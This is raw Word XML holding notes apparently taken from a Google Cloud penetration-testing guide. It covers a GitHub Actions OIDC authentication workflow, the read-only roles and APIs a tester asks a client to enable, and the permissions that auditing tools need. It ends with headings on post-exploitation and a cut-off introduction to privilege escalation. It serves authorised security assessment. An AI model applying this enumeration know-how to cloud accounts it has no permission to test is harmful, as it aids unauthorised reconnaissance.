          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>}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${</w:t>
      </w:r>
      <w:proofErr w:type="spell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saId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> for their respective values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161010C5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16008A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name: Check GCP action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C395D5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on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBDB41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workflow_dispatch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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB17B4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pull_request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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D2B50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branches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187862E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- main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7808B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60F366E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permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BF0FD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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  id-token: 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write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="60CEC0B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</w:p>
    <w:p w14:paraId="76C3BC4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jobs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1B493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Get_OIDC_ID_token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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D5616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runs-on: ubuntu-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latest</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2007A29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steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF618D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- id: 'auth'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F246FC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name: 'Authenticate to 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GCP'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="33E05C6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uses: 'google-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github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-actions/auth@v0.3.1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414525F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with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF6DE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   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create_credentials_file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: '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true'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="74B8B8B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   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workload_identity_provider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: '${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providerId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}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D94523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   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service_account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: '${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saId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}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E224E0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- id: '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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3519861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name: '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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F39145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run: |-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD2E9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 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auth login --brief --cred-file="$</w:t>
      </w:r>
      <w:proofErr w:type="gram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{{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steps</w:t>
      </w:r>
      <w:proofErr w:type="gram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.auth.outputs.credentials_file_path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}}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4981DF9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 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auth list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166B007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       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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eastAsiaTheme="majorEastAsia" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> projects list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C7BDF" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="0AA24390" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="2E292704" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="22E605EF" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="4CB318E2" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641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>GCP - Permissions for a Pentest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A60E17" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="42AFB14E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want to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> a GCP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>environment</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you need to ask for enough permissions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check all or most of the services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> used in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GCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. Ideally, you should ask the client to create:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6931D932" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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Create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> a new </w:t>
      </w:r>
      <w:proofErr w:type="gram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project</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="38664787" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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Create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">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Service Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside that project (get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json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credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">) or create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new user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D2E341" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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Give</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">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Service account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> or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user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">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roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> mentioned later over the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ORGANIZATION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23650CF5" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl"/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Enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">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APIs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> mentioned later in this post in the created </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>project</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="76AECC65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Set of permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to use the tools proposed later:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE44424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216DFE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roles/viewer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1297D3E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resourcemanager.folderViewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65A8B62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resourcemanager.organizationViewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1460FEB1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APIs to enable (from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>starbase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68177DD4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68430A5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services enable \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF009F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serviceusage.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BB0D3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cloudfunctions.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6D1B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storage.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D8586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iam.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C4827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cloudresourcemanager.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCD222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compute.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A3779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cloudkms.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072F1A9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sqladmin.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C0B0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bigquery.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE065F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container.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB4545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dns.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5714CD3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logging.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5410E27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monitoring.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CCA6E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binaryauthorization.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142BC43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pubsub.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1217D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appengine.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472A5C7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run.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2B142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redis.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B0255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memcache.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A95049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apigateway.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DD350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spanner.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E47F4C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privateca.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3987639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cloudasset.googleapis.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A039EA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accesscontextmanager.googleapis.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E917A6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Individual tools permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D05A2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hyperlink r:id="rId51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PurplePanda</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="140DF8E3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7711D88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From https://github.com/carlospolop/PurplePanda/tree/master/intel/google#permissions-configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ADB35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CC64F9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bigquery.metadataViewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3EE87A8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composer.user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77B049C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compute.viewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="410B49D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container.clusterViewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="691D4C6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iam.securityReviewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24099A5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resourcemanager.folderViewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F738E1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resourcemanager.organizationViewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F1E096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secretmanager.viewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E5C7FFA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hyperlink r:id="rId52" w:anchor="permissions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ScoutSuite</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2DA66A72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644E5BF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From https://github.com/nccgroup/ScoutSuite/wiki/Google-Cloud-Platform#permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2B410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F69FCF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roles/Viewer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501A404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iam.securityReviewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A20FEF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stackdriver.accounts.viewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7EE250BF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hyperlink r:id="rId53" w:anchor="cloud-provider-configuration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CloudSploit</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B40BBBA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D6EB0A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From https://github.com/aquasecurity/cloudsploit/blob/master/docs/gcp.md#cloud-provider-configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7BC79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9A4CC4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includedPermissions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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323E03F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cloudasset.assets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.listResource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="102A960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cloudkms.cryptoKeys.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4CC9B9E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cloudkms.keyRings.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="71EE5B7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cloudsql.instances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6038B28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cloudsql.users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7A27045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compute.autoscalers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45DF83F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compute.backendServices.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2AD71B8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compute.disks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1947369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compute.firewalls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5C0571E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compute.healthChecks.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="57EF963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compute.instanceGroups.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1D629A0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compute.instances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.getIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6ABB63B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compute.instances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31ED62A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compute.networks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7AEDC40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compute.projects.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E8739C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compute.securityPolicies.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="74C1834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compute.subnetworks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3ED5324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compute.targetHttpProxies.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="13F6835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container.clusters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731A821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dns.managedZones.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5AFE91F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iam.serviceAccountKeys.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="73336FB3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iam.serviceAccounts.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1751093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logging.logMetrics.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1ADC092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logging.sinks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06580C84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monitoring.alertPolicies.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7AE4D44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resourcemanager.folders.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37B0AE1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resourcemanager.folders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.getIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="101288D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resourcemanager.folders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3218383C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resourcemanager.hierarchyNodes.listTagBindings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="66321C0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resourcemanager.organizations.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B6933C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resourcemanager.organizations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.getIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DF3EB7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resourcemanager.projects.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="119E6CA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resourcemanager.projects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.getIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05BB5D4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resourcemanager.projects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7FF5092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resourcemanager.resourceTagBindings.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="766D4A7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resourcemanager.tagKeys.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59CF096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resourcemanager.tagKeys.getIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="76A8A19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resourcemanager.tagKeys.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3E4BEA4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resourcemanager.tagValues.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0167B07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resourcemanager.tagValues.getIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01EA673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resourcemanager.tagValues.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18860DC9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storage.buckets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.getIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69CB997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-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storage.buckets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.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42CB59B0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hyperlink r:id="rId54" w:history="1"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Cartography</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E3C82DE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42752E8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From https://lyft.github.io/cartography/modules/gcp/config.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2486CD8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286AD3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iam.securityReviewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63B12C7E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resourcemanager.organizationViewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F04B91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resourcemanager.folderViewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="133E5120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hyperlink r:id="rId55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Starbase</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58BAE5F5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514BDB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From https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BF344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D44777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iam.securityReviewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26A889A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iam.organizationRoleViewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2AB632C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bigquery.metadataViewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A1696D8" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="6F578D78" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="4F4BF607" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="56C7B51F" w14:textId="77777777" w:rsidR="003E0641" w:rsidRPr="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E06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  <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0641"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  <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GCP - Post Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDFC709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6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App Engine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51136236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26CF0E1D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7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Artifact Registry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41309047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6873141C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8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Cloud Build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5CF44B73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39D3B242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59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Cloud Functions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52400D0B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2B334D1E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0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Cloud Run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3EF4B05F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5BF04BA0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1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Cloud Shell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7EBFB36E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6AC81770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2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Cloud SQL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177E2DC2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57B875E4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3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Compute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50919113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2F305BB8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4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Filestore</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd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1E5AF65E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7925C419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5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IAM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282FD149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3990158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6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KMS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1AC16EC2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12408852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7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Logging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196CD7A5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323FF3D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8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Monitoring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3F55E4EB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5AC17DB9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9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Pub/Sub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5F3F0E18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2D6333A2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0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Secretmanager</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd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65CE8FE7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2B0675C8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1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Security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2B390D3A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61DE019D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2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GCP - Workflows Post </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/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Exploitation</w:t>
        </w:r>
      </w:hyperlink>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D406E8F" w14:textId="77777777" w:rsid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280A333D" w14:textId="1CF0CEF6" w:rsidR="003E0641" w:rsidRPr="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E064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73" w:history="1">
        <w:r w:rsidRPr="003E064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GCP - Storage Post Exploitation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E064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0E75143" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="1C844D24" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641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>GCP - Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E104B3A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Introduction to GCP Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2222B169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GCP, as any other cloud, have some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principals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">: users, groups and service accounts, and some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resources</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> like compute engine, cloud functions… </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Then, via roles,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permissions are granted to those principals over the resources</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is the way to specify the permissions a principal has over a resource in GCP. There are certain permissions that will allow a user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get even more permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the resource or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>third party</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> resources, and that’s what is called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privilege escalation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
